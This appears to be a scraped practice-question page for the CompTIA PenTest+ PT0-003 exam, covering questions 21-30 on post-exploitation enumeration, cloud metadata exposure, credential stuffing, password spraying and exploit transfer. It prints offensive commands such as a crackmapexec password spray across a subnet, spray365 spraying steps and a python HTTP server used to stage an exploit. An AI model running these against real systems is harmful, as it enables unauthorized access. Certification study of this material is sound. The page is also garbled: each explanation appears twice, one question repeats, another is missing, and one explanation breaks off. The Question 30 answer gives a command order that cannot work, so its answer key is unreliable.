Practice Free PT0-003 Exam Online Questions
Question #21
After exploiting a vulnerability in an insecure service to gain access to a Linux system, a penetration tester executes the following commands:
sudo -l
route
netstat -a
last
who
Which of the following best describes the tester’s purpose for running these commands?
- A . To obtain information about other systems in the network
- B . To enumerate users and services in order to identify additional targets
- C . To prepare for establishing persistence on the system
- D . To gather data to prepare for lateral movement
Correct Answer: D
D
Explanation:
The correct answer is D. To gather data to prepare for lateral movement
These commands are commonly used during post-exploitation enumeration to understand the compromised host, network connectivity, active users, login history, and possible privilege escalation paths. This information helps the tester determine where and how to move next inside the environment.
sudo -l checks what commands the current user can run with elevated privileges.
route displays the system routing table and can reveal reachable internal networks.
netstat -a shows active connections and listening services, which may identify connected hosts or services useful for pivoting.
last shows previous login activity and can reveal user accounts, source systems, and administrative access patterns.
who shows currently logged-in users.
A is incorrect because some commands may reveal information about other systems, but the full set of commands is broader and supports post-exploitation planning.
B is incorrect because the commands do not primarily enumerate all users and services. They collect privilege, network, session, and login information.
C is incorrect because persistence would involve creating or modifying access mechanisms, such as users, SSH keys, startup scripts, cron jobs, or services. These commands are reconnaissance and enumeration commands, not persistence actions.
In PenTest+ terms, this falls under Attacks and Exploits, specifically post-exploitation enumeration and lateral movement preparation.
D
Explanation:
The correct answer is D. To gather data to prepare for lateral movement
These commands are commonly used during post-exploitation enumeration to understand the compromised host, network connectivity, active users, login history, and possible privilege escalation paths. This information helps the tester determine where and how to move next inside the environment.
sudo -l checks what commands the current user can run with elevated privileges.
route displays the system routing table and can reveal reachable internal networks.
netstat -a shows active connections and listening services, which may identify connected hosts or services useful for pivoting.
last shows previous login activity and can reveal user accounts, source systems, and administrative access patterns.
who shows currently logged-in users.
A is incorrect because some commands may reveal information about other systems, but the full set of commands is broader and supports post-exploitation planning.
B is incorrect because the commands do not primarily enumerate all users and services. They collect privilege, network, session, and login information.
C is incorrect because persistence would involve creating or modifying access mechanisms, such as users, SSH keys, startup scripts, cron jobs, or services. These commands are reconnaissance and enumeration commands, not persistence actions.
In PenTest+ terms, this falls under Attacks and Exploits, specifically post-exploitation enumeration and lateral movement preparation.
Question #22
A penetration tester reviews a scan report and identifies a deserialization vulnerability. The vulnerability is due to the way a function from a Python library has been used in code. The scan does not consider input data being used in the function’s serialization.
Which of the following scan types most likely provided this finding?
- A . DAST
- B . SAST
- C . IAST
- D . SCA
Correct Answer: B
B
Explanation:
SAST is the most likely scan type because it analyzes source code, syntax, and coding patterns without executing the application. The question states that the finding is based on how a function from a Python library has been used in code, which is exactly the type of issue SAST tools are designed to detect. A deserialization weakness often appears when unsafe functions or insecure object handling are identified statically in the codebase. The statement that the scan does not consider actual input data further supports SAST, since static analysis usually flags risky usage patterns without observing live runtime behavior or real request flows. DAST focuses on behavior during execution from the outside, IAST observes the application during runtime, and SCA mainly identifies vulnerable third-party components rather than unsafe implementation logic in custom code.
B
Explanation:
SAST is the most likely scan type because it analyzes source code, syntax, and coding patterns without executing the application. The question states that the finding is based on how a function from a Python library has been used in code, which is exactly the type of issue SAST tools are designed to detect. A deserialization weakness often appears when unsafe functions or insecure object handling are identified statically in the codebase. The statement that the scan does not consider actual input data further supports SAST, since static analysis usually flags risky usage patterns without observing live runtime behavior or real request flows. DAST focuses on behavior during execution from the outside, IAST observes the application during runtime, and SCA mainly identifies vulnerable third-party components rather than unsafe implementation logic in custom code.
Question #23
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.
Through which of the following features could this information have been accessed?
- A . IAM
- B . Block storage
- C . Virtual private cloud
- D . Metadata services
Correct Answer: D
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
Question #23
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.
Through which of the following features could this information have been accessed?
- A . IAM
- B . Block storage
- C . Virtual private cloud
- D . Metadata services
Correct Answer: D
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
Question #25
A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access.
Which of the following techniques should the tester use?
- A . Credential stuffing
- B . MFA fatigue
- C . Dictionary attack
- D . Brute-force attack
Correct Answer: A
A
Explanation:
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.
Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.
Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.
Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.
Pentest
Reference: Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.
A
Explanation:
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.
Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.
Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.
Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.
Pentest
Reference: Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.
Question #26
While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?
- A . To perform a pass-the-hash attack over multiple endpoints within the internal network
- B . To perform common protocol scanning within the internal network
- C . To perform password spraying on internal systems
- D . To execute a command in multiple endpoints at the same time
Correct Answer: C
C
Explanation:
The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ is used to perform password spraying on internal systems. CrackMapExec (CME) is a post-exploitation tool that helps automate the process of assessing large Active Directory networks. It supports multiple protocols, including SMB, and can perform various actions like password spraying, command execution, and more.
CrackMapExec:
CrackMapExec: A versatile tool designed for pentesters to facilitate the assessment of large Active Directory networks. It supports various protocols such as SMB, WinRM, and LDAP.
Purpose: Commonly used for tasks like password spraying, credential validation, and command execution.
Command Breakdown:
crackmapexec smb: Specifies the protocol to use, in this case, SMB (Server Message Block), which is commonly used for file sharing and communication between nodes in a network.
C
Explanation:
The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ is used to perform password spraying on internal systems. CrackMapExec (CME) is a post-exploitation tool that helps automate the process of assessing large Active Directory networks. It supports multiple protocols, including SMB, and can perform various actions like password spraying, command execution, and more.
CrackMapExec:
CrackMapExec: A versatile tool designed for pentesters to facilitate the assessment of large Active Directory networks. It supports various protocols such as SMB, WinRM, and LDAP.
Purpose: Commonly used for tasks like password spraying, credential validation, and command execution.
Command Breakdown:
crackmapexec smb: Specifies the protocol to use, in this case, SMB (Server Message Block), which is commonly used for file sharing and communication between nodes in a network.
Question #27
While conducting a reconnaissance activity, a penetration tester extracts the following information:
Emails:
[email protected]
[email protected]
[email protected]
Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?
- A . Unauthorized access to the network
- B . Exposure of sensitive servers to the internet
- C . Likelihood of SQL injection attacks
- D . Indication of a data breach in the company
Correct Answer: A
A
Explanation:
Discovering valid corporate email addresses during reconnaissance is a classic OSINT outcome that directly enables social engineering attacks, especially phishing and related credential-harvesting techniques. In the PenTest+ methodology, information gathered in reconnaissance is leveraged to obtain an initial foothold, often by targeting users with realistic, role-based lures (for example, “support” tickets, “sales” leads, or “admin” notifications). The primary risk created by exposed or easily discoverable email identities is that an attacker can use them to deliver malicious links, weaponized attachments, or impersonation-based requests that may result in credential compromise or malware execution, leading to unauthorized access to internal systems and the network.
The other options do not logically follow from the provided evidence: email enumeration alone does not demonstrate sensitive servers are internet-exposed, does not indicate SQL injection likelihood (which is tied to web input validation and testing), and does not prove a data breach―only that addresses exist or can be collected publicly. Therefore, the most appropriate risk to leverage next is unauthorized network access via phishing/social engineering.
A
Explanation:
Discovering valid corporate email addresses during reconnaissance is a classic OSINT outcome that directly enables social engineering attacks, especially phishing and related credential-harvesting techniques. In the PenTest+ methodology, information gathered in reconnaissance is leveraged to obtain an initial foothold, often by targeting users with realistic, role-based lures (for example, “support” tickets, “sales” leads, or “admin” notifications). The primary risk created by exposed or easily discoverable email identities is that an attacker can use them to deliver malicious links, weaponized attachments, or impersonation-based requests that may result in credential compromise or malware execution, leading to unauthorized access to internal systems and the network.
The other options do not logically follow from the provided evidence: email enumeration alone does not demonstrate sensitive servers are internet-exposed, does not indicate SQL injection likelihood (which is tied to web input validation and testing), and does not prove a data breach―only that addresses exist or can be collected publicly. Therefore, the most appropriate risk to leverage next is unauthorized network access via phishing/social engineering.
Question #28
A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network.
Which of the following is the best way to accomplish this task?
- A . nc -lvp 8080
- B . nc -lnvp 443
- C . python3 -m http.server 80
- D . ncat -lvp 9090
Correct Answer: C
C
Explanation:
The correct answer is C. python3 -m http.server 80
Using Python’s built-in HTTP server is one of the fastest and simplest ways to transfer files from a
Linux host to another system on the same network.
By running:
python3 -m http.server 80
from the directory containing the exploit, the tester can host the file over HTTP. The Windows 10 system can then retrieve it using a browser, PowerShell, certutil, or another HTTP-capable download method.
A, B, and D are incorrect because Netcat/Ncat listeners can be used for file transfer in some cases, but they require more coordination and commands on both systems. They are better suited for raw TCP connections, shells, or manual transfers, not the quickest general-purpose file-serving method.
In PenTest+ terms, this falls under Tools and Code Analysis, specifically using common command-line tools for file transfer during post-exploitation or controlled assessment activities.
C
Explanation:
The correct answer is C. python3 -m http.server 80
Using Python’s built-in HTTP server is one of the fastest and simplest ways to transfer files from a
Linux host to another system on the same network.
By running:
python3 -m http.server 80
from the directory containing the exploit, the tester can host the file over HTTP. The Windows 10 system can then retrieve it using a browser, PowerShell, certutil, or another HTTP-capable download method.
A, B, and D are incorrect because Netcat/Ncat listeners can be used for file transfer in some cases, but they require more coordination and commands on both systems. They are better suited for raw TCP connections, shells, or manual transfers, not the quickest general-purpose file-serving method.
In PenTest+ terms, this falls under Tools and Code Analysis, specifically using common command-line tools for file transfer during post-exploitation or controlled assessment activities.
Question #29
A penetration tester receives the following output when enumerating a local user:
User compromised_user may run the following commands on localhost:
root (NO PASSWD): /bin/vim
The tester suspects that another host on the same subnet is also vulnerable.
Which of the following is the best method to validate whether the other host is vulnerable?
- A . ssh compromised_user@victimhost "vim; echo $?"
- B . ssh compromised_user@victimhost "sudo -l"
- C . ssh compromised_user@victimhost "bash -c vim"
- D . ssh compromised_user@victimhost "ls -lah /bin/vim"
Correct Answer: B
B
Explanation:
The correct answer is B. ssh compromised_user@victimhost "sudo -l"
The output shown in the question is produced by the sudo -l command, which lists the commands a user is allowed to run with elevated privileges.
The key finding is:
root (NO PASSWD): /bin/vim
This means compromised_user can run /bin/vim as root without entering a password. That is a local privilege escalation risk because vim can be abused to execute commands with elevated privileges when permitted through sudo.
To validate whether another host has the same weakness, the tester should enumerate that user’s sudo privileges on the other host:
ssh compromised_user@victimhost "sudo -l"
A is incorrect because running vim only confirms that the program can execute, not that it can be run as root through sudo.
C is incorrect because running bash -c vim only starts vim through Bash and does not validate sudo permissions.
D is incorrect because listing /bin/vim only confirms the file exists and shows file permissions. The vulnerability is the sudo misconfiguration, not the presence of the vim binary.
B
Explanation:
The correct answer is B. ssh compromised_user@victimhost "sudo -l"
The output shown in the question is produced by the sudo -l command, which lists the commands a user is allowed to run with elevated privileges.
The key finding is:
root (NO PASSWD): /bin/vim
This means compromised_user can run /bin/vim as root without entering a password. That is a local privilege escalation risk because vim can be abused to execute commands with elevated privileges when permitted through sudo.
To validate whether another host has the same weakness, the tester should enumerate that user’s sudo privileges on the other host:
ssh compromised_user@victimhost "sudo -l"
A is incorrect because running vim only confirms that the program can execute, not that it can be run as root through sudo.
C is incorrect because running bash -c vim only starts vim through Bash and does not validate sudo permissions.
D is incorrect because listing /bin/vim only confirms the file exists and shows file permissions. The vulnerability is the sudo misconfiguration, not the presence of the vim binary.
Question #30
A penetration tester is preparing a password-spraying attack against a known list of users for the company "example".
The tester is using the following list of commands:
pw-inspector -i sailwords -t 8 -S pass
spray365.py spray -ep plan
users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan"
spray365.py generate –password-file $pass –userfile $user –domain "example.com" –execution-plan $plan
cew -m 5 "http://www.example.com" -w sailwords
Which of the following is the correct order for the list of the commands?
- A . 3,4,1,2,5
- B . 3,1,2,5,4
- C . 2,3,1,4,5
- D . 3,5,1,4,2
Correct Answer: A
A
Explanation:
Let’s break it down in order:
Step 3: Sets environment variables (paths to user list, password list, etc.).
Step 4: Generates the execution plan using spray365.py generate with the variables set in step 3.
Step 1: Filters the password list using pw-inspector to enforce a minimum password policy.
Step 2: Executes the password spraying using the generated plan.
Step 5: Optionally verifies availability or reachability using cew (custom enumeration wrapper).
The correct logical order of operations matches option A.
CompTIA PenTest+
Reference: PT0-003 Objective 2.3: Perform password attacks.
Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.
A
Explanation:
Let’s break it down in order:
Step 3: Sets environment variables (paths to user list, password list, etc.).
Step 4: Generates the execution plan using spray365.py generate with the variables set in step 3.
Step 1: Filters the password list using pw-inspector to enforce a minimum password policy.
Step 2: Executes the password spraying using the generated plan.
Step 5: Optionally verifies availability or reachability using cew (custom enumeration wrapper).
The correct logical order of operations matches option A.
CompTIA PenTest+
Reference: PT0-003 Objective 2.3: Perform password attacks.
Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.